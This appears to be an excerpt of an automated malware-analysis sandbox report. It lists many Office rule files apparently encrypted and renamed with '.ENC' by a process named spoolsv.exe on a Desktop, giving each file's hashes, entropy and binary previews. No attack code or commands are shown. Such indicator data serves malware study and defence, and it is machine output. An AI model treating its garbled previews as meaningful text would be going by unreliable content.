                                                                                                                                                                                                                                                      Entropy (8bit):7.5425857025205385
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2CptaIA85zopGbYJhepdgsk92cCm9zh:/eptA85zrbYJ4Q91zh
                                                                                                                                                                                                                                                      MD5:E611AC0AF85AB4C4DFFE2A4266C93D75
                                                                                                                                                                                                                                                      SHA1:CD8D36F1EE8ECD3433F188B999F1692949835971
                                                                                                                                                                                                                                                      SHA-256:5EC92A4BE240085F427A09DFB45D49E5F55B93C4644968AA2931F0853A806992
                                                                                                                                                                                                                                                      SHA-512:6BF65C9EA717B13241E2CEFD558C5359ADB4DA7A56B06EABBD1737D89D18532EF269DEACA23474E4411A67C0540AE5C127D92CF970B32A22D22D9D9DB8B75D1C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t....Zx.~...h....2.......e....k.'r..$..R,..)i0...U....1..]...*^..f~n.4......%.].{...o5..].I2........26....?....$.i7./..&.[a.~.T.....X.jY......K...{.S...6.....e[..$.e..)..m.M.d7...m....U...T..F.g..6._.Z..N...].....H.P.AoN%..x..p.."{.}.=...f#$=..e.......$....A....%......6...Q.w....C..>S.........N...Y.I.w,?.4....mb......A.....X..*..Q.De[.!....].9.{...@.\.%7.M.Uk

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120638v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):496
                                                                                                                                                                                                                                                      Entropy (8bit):7.574951466921068
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2BEQte4LcYBxuZzCC4ET1Mg8l5CGmlEZ:/dEQk4oixuxMET1Mgw5CJEZ
                                                                                                                                                                                                                                                      MD5:5D48F92630FAC816114452CA9559A022
                                                                                                                                                                                                                                                      SHA1:DED9FB68D68950609929A5B7126D2D65EBA57ACF
                                                                                                                                                                                                                                                      SHA-256:FADADF2C5B0A3AAB9CBED06BC8ACE5B47C2BB0731DFF7C8BE36C35D7362EB138
                                                                                                                                                                                                                                                      SHA-512:8CDD84E9E91E1A5F29DF85481FB1116EE3FDF6D68EF2A9040676620FD477B5A02783D258EE3DCF2B1FE0FA24B521D5B81C1237125037089314B1BBF4A8818D30
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...m...0_>..epk=Q..$.i..q9.Q.lb./Le.....q..,b.(.IN.ad...........<1....[.4.m..*M...L8.. ...g...E=.uA.c.6..L\..)..=..'......#....d....qUP.2......S.b...U.......]k.@V)..... k.S.0lP..,......h1^.t{...I..C....{(.7...M...]...V.8.6..`.A.>;.hw....b-...}.A,B.......4..V.3.....}.Mm1.....M.gO..ia...l....X0.l............+)..w~o........?.:....cR.._...h.,..SZ..s....;.I....A......Mwq..g..@=2bP.......}.1.*..T../Z.}..~..b..(....$..lo..j

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120639v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):432
                                                                                                                                                                                                                                                      Entropy (8bit):7.503823970149696
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2uY7uJM3a/wlNVWEWeZ+nsSakEZ7/dd0Y7x:/qivFRWeZT9/ddLd
                                                                                                                                                                                                                                                      MD5:9D1C3B658CDDF4BBCE84806F33785E90
                                                                                                                                                                                                                                                      SHA1:0A273C9146C69D1AED18A5D2EB159B338AEBCE8E
                                                                                                                                                                                                                                                      SHA-256:A4CB767A31613C53D2BAFD7483211D6891082669F1C81BD928F1C9CF6E2C3880
                                                                                                                                                                                                                                                      SHA-512:960AED28D8E88A3552D47BCD77A8061857F2DE4B4C27D184487480163EEA9D430B31C8919AF423E939DD475E0569ED69E0324B7D678F41B7C95DAE42B7870815
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t....Q.OT..+...."..e.*.. ...sH....!.......+...3...HQ...z..wm1.R....8~.. ....9%o....E.JY...r{..........z..8.......6ki:N.2..<p\...<}......U#-.6...p....m^0S...D5...)..C......S..f.......x..UM.....X..F...3*.xN..f........c...T.z..#..u$)....(7A...Yw..c.s..G....fa..........85f.J7F..~.....?.xixE....ey.......3.P...fV....U..w..H]l..._..h.oi...ng.Y).q.cW..8q.%...'Y.?J

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120640v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):480
                                                                                                                                                                                                                                                      Entropy (8bit):7.528815070866999
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2n95laxCIdzy1fV+Aqm/Updh4+kRqI7OBG+Al0:/T9czy1t/MpY3N7mDA6
                                                                                                                                                                                                                                                      MD5:A1AE0BBBAF591469F693FF58D991C6FE
                                                                                                                                                                                                                                                      SHA1:E6FE2A33000178C81E6E04EC576740D10EA3AE7F
                                                                                                                                                                                                                                                      SHA-256:4B7139E4F7963598ADCF61D0995020F44C758D1CBC97F928CE8A4051848300BB
                                                                                                                                                                                                                                                      SHA-512:137DFC637DC1EAEA570D24E11E2097D9CF5AD52544A712B2911C034067047D839F955DC0E88D4DA7EA38236C138B795F1C0965F0E4DE1976074E73FD906C681C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.....!.....3..|.sV.H,...{.t-".2.;.3..E.Y.....)...2.p9.y......h.X..)....'. ...C~.'yr9..r.F.....7..Lk...=.[....5.Z...u..ck...A...X.L.c.[A.$...B.0R..x..x^I.N.q..l...CPi%I.5...3\.ou...WA......En.v......>.3.jw..j...>.C..../..Xt............^..[(1....7..Yy.;5E*..8..?.Y.l5..B.....0:.\\mNNyQ).q.}~x...B.OC..v@.$...S.kA.(..../.... .-t.....h..>V....@.HxF}.....F.d.}Bhf....$..(S...n/.p..xt-..3.....d...."7V...~..1.~.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120641v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):416
                                                                                                                                                                                                                                                      Entropy (8bit):7.462920580219109
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2Tzj2xGSR61OCbQ2oxip7do7fsPJ8uWiD:/PLv1tcedkER8uF
                                                                                                                                                                                                                                                      MD5:77F925039153A105ED98E1B0A754E1A2
                                                                                                                                                                                                                                                      SHA1:731EB1F5F6DF7473365A40ECD527FA44747D2AD3
                                                                                                                                                                                                                                                      SHA-256:E1E68F7DAF65B527AD7A97203C2424C88737F86BA7DBC2E49357FD2E15FF846D
                                                                                                                                                                                                                                                      SHA-512:C38E320AF54F2C19B9F22BD0617AD6A44A068C5B8848ECCA9CDF21E2BA8FA29E59F65F6DB071E67D5252BB7E33F69830817299EB1C294C68EF0C11F25ADEFE97
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...2....P....x..<:'...A..V.@o3.4.fc`..l}e9=M.......A..:.H.8..Mh.z............J..B..>}.......X..^....NF..'X...d!\=...2,96.^..L..Y...X....?'c?......=..........m.]Md..7.&.?TQ$+."..q.....X..n.&[.eJ...a........i6..|..%.6.R..........W..q......A...ntd.`JtI..<..8%Ny.Q.t?..k..v..).+....V..M..........>..3....N.._.`.U......NZ".=..z|..8.nH....Or.5>k.....r.DHe..).

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120642v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):480
                                                                                                                                                                                                                                                      Entropy (8bit):7.628156059191131
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s21MYnEjcWiw7o6egJv5mRL4GAAkxk46U508rFYu0vJ3e:/JMjcWbP/5S2ruuo3e
                                                                                                                                                                                                                                                      MD5:56E9D31B98E7D35A466110D3F6F9C796
                                                                                                                                                                                                                                                      SHA1:4238643C138C4AD69D981FE34582FEAC086C6EE7
                                                                                                                                                                                                                                                      SHA-256:51D36B74F1FE2C09F997E9A052E64A877A5F34E0F722B45497F0EB40B15EF892
                                                                                                                                                                                                                                                      SHA-512:7A97056A2B00F20BF20CC8E7109D008BCA6B34E327919392E31D796497D09FE31EA8061F0EB21E4A9847CF009F7EF870726AD93EC962632B4AB02448A7005341
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.j.....0.(+a......S7.ms<...+&8R...g.)Xb..d/[[.=..B!..Z....[K.8.gvb.pb....z..7x..N.K...}A....;.C.T.K..G.F44..:....J.....$...t..2.XS.kI....5o....;.8.gO90....E...kC. X..._.%./W..,.Y.f....7Bn6.....+...e..lLm..1<N...4..#".........m.....NT.D..3..N... .=$.6..&!i?W...)G_."....X.`.fyU.8.7-cs..T..s...ojK.h..@.=1...k......%.J0..u..0...|..........c..V.....r^Z,../..e.'#.Cx..1.l4 .&..y+3r...oO...7.....3...&.......]\=...VA.9

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120643v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):416
                                                                                                                                                                                                                                                      Entropy (8bit):7.5099751633215055
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2YAb2NZFc6AAxSm8YiYmB+KHhfiKQcU3ck6:/43yAom8aKHAKJdk6
                                                                                                                                                                                                                                                      MD5:8DBA5B1862895E36549E1611AB6D2120
                                                                                                                                                                                                                                                      SHA1:489F07FE6FA4CA90493DE6764F8D5CFE15E5D432
                                                                                                                                                                                                                                                      SHA-256:7A43FF9C97210BCFD56A87C879E9349C3AF08AF531B1B0BEA3531BC062DDC70C
                                                                                                                                                                                                                                                      SHA-512:8B41F70E32F1E4052CE3D19E0B1F22CAAD98B00985B9C28200710BDC4B0ECA83AB5448451A1A9694AE7007063EA582836F91F82974E73DEAB64B069F238B6650
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.......6...>.c....S..;.i5}...,.~.r..%L.)!##......."..~.y........l@.].T.=.....\..^...u.d...RI.a...".6.....@\$|.Gy].i.).-.2..W.e.g..1.W.U.I.MA....g...q"<.........C..7./.?...............fj<.3...i.._...{.RX...~..w.#....Y..+o0.);.M.V.djb,BP...~Y.y.Z0.j!.5..F%{|...T.....uy.....%.(....O.o.$p..Z.kp.....E.D.O?.jP.x..9.n..A..&8D7.X0C.....N..7.e../..l.KWxJ_.1.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120644v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):480
                                                                                                                                                                                                                                                      Entropy (8bit):7.58955329874742
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2+2t9dioFDGhCGOwvqHvWfdqycGwVnJI7qzQ3I7d:/isd1DnGwHufdqGwVnO7rIZ
                                                                                                                                                                                                                                                      MD5:01FB5655AF4831FCD774D204929CEDED
                                                                                                                                                                                                                                                      SHA1:245B3E08C395F438CF58203912EED94FB8F13AE9
                                                                                                                                                                                                                                                      SHA-256:80BF4E173F141C8997E7D0D5CD9D7CAA268BFF07DCD5F72694E3AB3849BD70E4
                                                                                                                                                                                                                                                      SHA-512:DD54D892F8F91F1A79DA4756608C60043BC2560F52BE85160129E8ECAFC0E0DD5BE368C0A47A45071B8DFD7E28284987F7BC9AAED3FC7F9F0166F3B5A9D0576D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.....Dv...c...3......N.....6.Zq.).P.:-4...qS......~..08...6.r.t..Q.K.N&!.....J.Y.x...(......~\..."a.x......A.../]...h..}..f....P.'.r.v."....t...(G<y(WZ.ng...~....jd7..t.d..:...Q......Eb....U..d.`-.....1.mV.4...,.O....E...0..v..\..F...z.K.V q..1A.y.bf7.."..._.X.....w.J.........cp\g}.7.MD8EG.j.Z..y..].B.M...q.~.3..>.x.o..R.L....R...... ..S.Y.5AV.o.?.Si..,oQ.......t#o[.6.1.....u9......9....:.e..L...C7JH....jY.,.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120645v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):432
                                                                                                                                                                                                                                                      Entropy (8bit):7.5067432408183015
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s26WLFwGgKp4TMGh19d58kZdvLFzDncC:/9LF4W+199d3
                                                                                                                                                                                                                                                      MD5:7BE2775A31813AE6E73287252F899406
                                                                                                                                                                                                                                                      SHA1:BE08EAF7C48C8C1BCB6BA390E46CB9ECD8DBD1AA
                                                                                                                                                                                                                                                      SHA-256:5B6D0CD6527B9C0F374CD1AFE11E8B45110F3B55F6E411655353A28B448B5C76
                                                                                                                                                                                                                                                      SHA-512:0B40D7128F3B1653E57ABA9B90B0F2CC81DE67E72FAE4E721F71DEA16101ED4586B385514D952ED382AF90FB8BCC5B5C9874A1892F45A9519C5852F31B8EF8F4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...p.y#yg...S....G.Y$..y...z.I.-.....m{.Z.\.!.1.d..9...,....#....Zh.....4!b3!B...m3.....s0..+..MXK..2.:.y...D...X".%..w.b?.!Y..~)Z.(.=..E....A1....V........A3....{.Y.%R&.q..7..&...rG.....N..].r..V.NO......F.a.....W.......$:.m..(O.1..ZpO. ..~ ./.M...N...ir......Q1..P.NRo....XLI..1..3.+..=.Y.O....9x.8...1....0.6.?F..m....3..*.~z.4)Io.`...+.8a. ...t......KYX..W

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120646v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):480
                                                                                                                                                                                                                                                      Entropy (8bit):7.594217529908934
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:/b20s2p0Yr8FXy9wGSWYihbF7FlyWb5pcPJfjDqNl/0Nxrc7HKOYKQz237xtyR2F:/7s2aYrL9wGSgH7Fl2PJfWN9tyD3uV
                                                                                                                                                                                                                                                      MD5:1115ED3F93E6A65EC923446353AC7166
                                                                                                                                                                                                                                                      SHA1:2353E5D0E78C129305BFC7C41EC7FB260A7DB3CD
                                                                                                                                                                                                                                                      SHA-256:CF1ADF7C237FDB41B35752E23694C663801616667416728D08306B4551DD6972
                                                                                                                                                                                                                                                      SHA-512:96BD96F8312A3373BF395C223A0A5A1FA42B8942BFD77B12978D86A090A6B412C8653AAF2A6C17BAE2F26B44F077DA6A488579168ECC0B3846F759DF439601A3
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.{f....!i..".7t..].. ...m.|..>.eG..4...qC.m.o.....b.A*...."'U.s.....pb.J.$....%.. LC.......g.F.&.r..O;..8..J...X.t.4U.#a..?c.`..`#.^.R..4.y..B...5{.K....}.G..8........K.rN.{KJ...C7)Y....Fy.q.?J......q.J...f.....9.%..vw@..g.4@.(.........{F.3....F.+.+....].w}.oY).'......R...6.|./.....2..}.f...5...8.XM..,..p.4B...~..3M.....T.C.iQ......smzKzY.I.......J~.,.E..#c>W.`..G.....l..O.:}..N.-+OV.j.a.r.......W+....#<L.q

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120647v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):464
                                                                                                                                                                                                                                                      Entropy (8bit):7.538670974826673
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s23mV6WMOmIgzF2kegXyyosIGVpg7bNqX:/TmkWMO4F2qiyEMX
                                                                                                                                                                                                                                                      MD5:033BA1651B6AF3EF3863C6DA7B6C0E3B
                                                                                                                                                                                                                                                      SHA1:5E31772E6C8CE355784EC9649A525400B47EA7BE
                                                                                                                                                                                                                                                      SHA-256:1116B0287A26BCF3858AD1FEA553C81344A09744CE4DB64AAEC3EF21FBFBE1B6
                                                                                                                                                                                                                                                      SHA-512:7A0006494FF42B85132E0FBD49908DFD7127C67FB68AF66ACF7ADEBAF40C9944D891D54DF28BB4B7E91652C592F9B5687936A5E36C27051EE2E414DA3DB59189
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.nD...../.(...BQ......R*. 8I..R.....j.Z!1..%>.........-.....^...r..../....$T.(............A.[.q.0DS!..........O>4.O....".H.....-..V.h.".|Dn...o..................D.vn....z...7.+B7<.......j.sDW.x....lk<...2....fv....I..m.....~.Ac|.a.R...D..[.."."c...\Gt...M...w...rc.{.tD..........P.c.E.k..P?Z..!..k#.|.~..L..8....i;.....nF...`...G....C.CC...r\.z.P=...P..2.y.m.B....5.....G..<.Zf...B...UY.^)

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120648v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):496
                                                                                                                                                                                                                                                      Entropy (8bit):7.5483913408336765
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2UMLWfH0ZdNtSxLq6NJYz23d07eZpjIqatAMeMj:/wMif0Pz6N3d5XjIVpj
                                                                                                                                                                                                                                                      MD5:588415460E9899D3FF2A68EA3FB79436
                                                                                                                                                                                                                                                      SHA1:5CD1ACF4D67FB37ABAAB47D7E3DEE890A2CC043D
                                                                                                                                                                                                                                                      SHA-256:0D3D850FE1C024BE54047C1BBE3918ED7DFBB9C8300A89AD16EBFD8D60EF9311
                                                                                                                                                                                                                                                      SHA-512:0807E642038E30C03FA1F5C66609559F2A6F85B53924A45F66B86CF9054B0F7DDF9DE68159EE480E2DA794FBD07F76EFAF963D237A96A62B25AB2F3AA44BCD84
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.t+^...:...&..a8.A...s.9...M...[...n..ttN.X...'..n..=."...c...d.N:....Z`'..t>a...1...z!...u..r4'....H.1.m..,...[...AO.ejR.<.2L>.K..F?9.6.I^i..m=.o.2G../-r....O.0.\.L@...o...r..H....K(......R..9...&.......=kM..W+G..?..F.,...+...HFs..<..7>.RA\. ..O.......g.=...t./..pg.. .h....9.2Lx..%......).874G...O.hN....N9X...;.q...R.,....Y.n`3..,pp..A.&.IS?$:......I..n..A:.J.q...\..^.G....d...z..sw....["...[.....(e`-:......A..\.}..}.AM.T.qu.0]

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120649v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):432
                                                                                                                                                                                                                                                      Entropy (8bit):7.433773232779716
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2fFvp0yHdaLYYmVW9RsO+wph7B6pw+1p70x:/FQLr/9RQy7BCwC0x
                                                                                                                                                                                                                                                      MD5:7E105D673A51D82BB88445E8949940E5
                                                                                                                                                                                                                                                      SHA1:5C2056DD6C3FAAAAFB4CC3D8550DA406C00F0685
                                                                                                                                                                                                                                                      SHA-256:8FE4837F7A4EB2FFDD5F2F547C7BD86596E7B0C7F734A4AEEAC9D89B7DBD1E32
                                                                                                                                                                                                                                                      SHA-512:5937637BAA4680CF95F7D5F0D700E65C4B3D7ABF85A1C9649BFCC6BAF7E36D55AF68A5A964967CE4D677034232A30E3C1266F8894DF15CBC2129F7E5FD783718
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.@.b........K.ML..HO...$......ZK..E....a.PC........8.g..XLmx#].mHw..eP.......c.q..w.8.~+.}.WL...].T...T...D'....Lj..oxe.-.=z.v?eW.._...F..........2ct....<r<O..V~...;.[o`.........||.4I.Ngv...8.Ht9.h.......,..]..K.r...>.X....j.......x.;3.r....9......Yf....o..Hi.~.&..NU...N.!....d....e<..Lb......hy..Q.!.^.$.........P..$b2zZDG.........."....nU....N.8*..L..........g.ebl.;...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120650v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):480
                                                                                                                                                                                                                                                      Entropy (8bit):7.559897746988964
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2aXNimgCdYrE623hso88jxiqIa91UHRxBFseqgFy3FX:/zEestNiqIi1Cx1cX
                                                                                                                                                                                                                                                      MD5:C28915F24FFBE543A7F7101DF5939B4B
                                                                                                                                                                                                                                                      SHA1:E131DB98995B510596516231424C38B87305FE0F
                                                                                                                                                                                                                                                      SHA-256:A11BE2570E8B6FAE27523B5ECBFFB07035E621E7881DE09996C7F6A6CAD87A33
                                                                                                                                                                                                                                                      SHA-512:ADB6408C33A437B987C0A133914839A250FC1EF4C8D5FD8935273E4F090BC220C43ABAB2E76D770D99E5E9E998CF063BBF785B6CE23FC9CD5F524023C9C10229
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.t.c......#...1Hc..(..T..l.s.....?..~*6.E. .C;..c.......22...h...j....5o.o...GW.@.egQ..._....ZFu.4}KW.0..$j).5r.....b&2..O.+.6-5...ZC.%7g.l....:&;....eW.-....OWS.1=G}...g.......Y..k.:2...v.b"m.~.T...i.H..W.`Qa#../..............Y.#.)..s.^...c.Y..Y@...+=....lD.....1..4C..#^......i.R...=.h...:...4.f...E..F..L??|....PX_.*q.E..O...+.V....k.....re.=.+j.7.[....A..}6.....v.....2.x..4....R.y.K@s...+yr....3}.......#..[j..Af...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120651v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):416
                                                                                                                                                                                                                                                      Entropy (8bit):7.509058679738122
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2dllopIGh4qWvslrELfNEc+MKW9OPHY6:/Bll0hR6KyNEctID
                                                                                                                                                                                                                                                      MD5:F10EFBB310F75CB0D5C2B743D9EF24DA
                                                                                                                                                                                                                                                      SHA1:CD3C3ECEC90DEAA978F48434A453C8242BFCF6A8
                                                                                                                                                                                                                                                      SHA-256:DE89851794210CA8BBA35AD051EAF330CEED6BE12A918EBFC28FE56707135849
                                                                                                                                                                                                                                                      SHA-512:1A342EB199CBFD9E60F6C68EDDE0117523B45833FB9CBD5768DA4C92F93443E8438C57EEA90B26A7A152D45C57B445FB11193D4A5022CF407EBC9D2A7228890B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.:J....H..M.@.@\L.c_...().xb...>k..x*..>%}........V..Kz<.3qD.d.}{..q...,.....*5..=.[*....Q.t..4.mNW.."p!.}.5........G.:.'..6.DU9.RdM\..=.:Vm.....t.......Wc......h3..q...kD.....$..w......pOh.i1....._g........Z2..(..8.W...O.L..;<..}mi..(9.<u..+.l..a.m..ecw.{...N7'.4aGW/......._.(.....9.....b.+..*.z9L...a....a.6k..5...=Y...f......ib......Y..zGEl...X....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120652v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):480
                                                                                                                                                                                                                                                      Entropy (8bit):7.574386535410596
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2ZHrwzMVEE1WAtBPu/t4BfPq2Cx4eFJsaOEQcX:/1wTE1rBPJ5Pq3BJQcX
                                                                                                                                                                                                                                                      MD5:D062F31553110E01A90D72DEA9D227CE
                                                                                                                                                                                                                                                      SHA1:7F94B84C9A6A385D4EF3DAB7A93177ADFCB5181C
                                                                                                                                                                                                                                                      SHA-256:0624A0DC7E3BAB02256EC02FA55F9FDD7C7767C3DB2C78D4665EF6888EB56E87
                                                                                                                                                                                                                                                      SHA-512:14A10FBE612994595E34AE9FB58F3A872AE82630BE1981394C05C13AA640E1723DEB7AB6F994F99DA5C564070A48B5267420D7F8E05D4331848B70736D5203B3
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.d.:#.....#...N._. .....wWO...3N.....f!-...~...E.{.Mq9N..o.....1r[KZ.T.f....l.$.a.X.I.......Y|bg..S..1.K.=..+\......*....U.H.l=.v....<O.......5......8..axc.A....K....Q*...\.yy...a....z...,......w....)...........dd&..z...C..E...W.|.S/..*CKf+....|....v.*.....^.}...2.P/..=9.*F.+.sR..~.@...D.\&./Z..n!./.s*.....N:.GXj....Dg`..|...l.,.....O..j...<.B.,......V...<+X.9.7 mDT.")4.\....by5...0.$....y/-.e..(...w....u.s

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120653v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
